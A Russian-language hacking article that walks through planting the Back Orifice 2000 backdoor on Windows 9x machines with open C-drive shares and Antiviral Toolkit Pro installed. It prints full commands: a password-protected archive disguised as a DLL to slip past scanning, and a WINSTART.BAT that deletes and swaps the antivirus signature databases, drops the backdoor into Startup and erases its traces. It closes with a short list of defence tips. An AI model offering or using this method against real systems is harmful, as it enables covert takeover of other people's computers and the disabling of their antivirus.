Цель данной статьи - показать способ
взлома
вашего компьютера. Автор не несет никакой
ответственности за ущерб, который может
быть следствием прочтения этого сообщения.
Данный метод работает только на Windows 9x
русских версиях (для английских версий
необходимо подправить каталог автозапуска),
а также при инсталляции Antiviral Toolkit Pro в c:\program
files\antiviral toolkit pro\ (по умолчанию).
Рассмотрим следующую ситуацию: есть хост,
имеющий общий ресурс С с полным доступом,
установленным Antiviral Toolkit Pro. Как положить на
него backdoor? Для этого надо заархивировать с
паролем (BackdooR) сервер бакдора (будем
использовать Back Oriffice 2000). Пароль
используется для того, чтобы AVP сканер не
смог обнаружить сервер бакдора:
>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE
Теперь AVP не сможет увидеть сигнатуры BO2k в
ASYSLG.DLL (если установлена опция проверки
архивов).
Затем необходимо обеспечить запуск
сервера и обезвредить AVP. Для этого напишем
BAT-файл:
@echo off
attrib -R c:\progra~1\antivi~1\backdoor.avc >nul
attrib -R c:\progra~1\antivi~1\trojan.avc >nul
del c:\progra~1\antivi~1\backdoor.avc >nul
del c:\progra~1\antivi~1\trojan.avc >nul
copy c:\progra~1\antivi~1\macro.avc c:\progra~1\antivi~1\backdoor.avc >nul
copy c:\progra~1\antivi~1\mail.avc c:\progra~1\antivi~1\trojan.avc >nul
c:\windows\pkunzip.exe -e -sBackdooR c:\windows\ASYSLG.DLL
C:\Windows\ГЛАВНО~1\ПРОГРА~1\АВТОЗА~1\ >nul
del c:\windows\pkunzip.exe >nul
del c:\windows\asyslg.dll >nul
del c:\winstart.bat >nul
echo on
Расшифровка построчно:
отключение вывода на экран выполняемых
команд
снятие атрибута READONLY с файла backdoor.avc (база
сигнатур для бакдоров)
снятие атрибута READONLY с файла tojan.avc (база
сигнатур для троянов)
удаление файла backdoor.avc
удаление файла tojan.avc
подмена базы (для того, чтобы при запуске
сканера AVP не ругался)
подмена базы (отсутствие базы)
разархивация бакдора и помещение его
автозагрузку
удаление PKUNZIP
удаление архива с бакдором
удаление файлы запуска
Почему это будет работать? Потому что при
старте Windows если в главном каталоге
находится файл WINSTART.BAT он запускается на
выполнение. При этом пользователь не увидит
ни одного сообщения. Затем необходимо
скопировать на удаленный компьютер
следующие файлы :
ASYSLG.DLL в директорию c:\windows\
PKUNZIP.EXE в директорию c:\windows\
WINSTART.BAT в директорию c:\
Итого необходимо будет закачать 86.508 байт.
Все. После перезагрузки на компьютере из
автозагрузки запустится сервер, удалит
себя оттуда и запишет себя в c:\windows\system\ (сервер
должен быть сконфигурирован на удаление
оригинального файла). В принципе, можно
использовать архиватор CAB, и проводить
распаковывание программой EXTRACT.EXE, которая
присутствуют на почти всех компьютерах, что
позволит уменьшить размер перекачиваемых
данных, однако данный архиватор не
позволяет архивировать с паролем, что может
привести к обнаружению сервера бакдора
сканером (если включена опция проверки
архивов).
Рекомендации по защите от данного вида
атаки:
- Закройте все общие ресурсы! Если вы без
них жить не можете установите на них
пароль (не менее 6 символов и не менее 1
спецсимвола). - Поставьте себе Firewall. Даже если эта атака
пройдет успешной, получить доступ к вашей
системе не удастся - Firewall вас сразу же
предупредит о попытке проникновения. Я
рекомендую Tiny Personal Firewall. - При обнаружении и внезапной пропажи
каких-то файлов сразу проверяйте свои
диски антивирусом, а также проводите
профилактическое сканирование дисков не
менее одного раза в неделю. - Своевременно обновляйте антивирусные
базы.
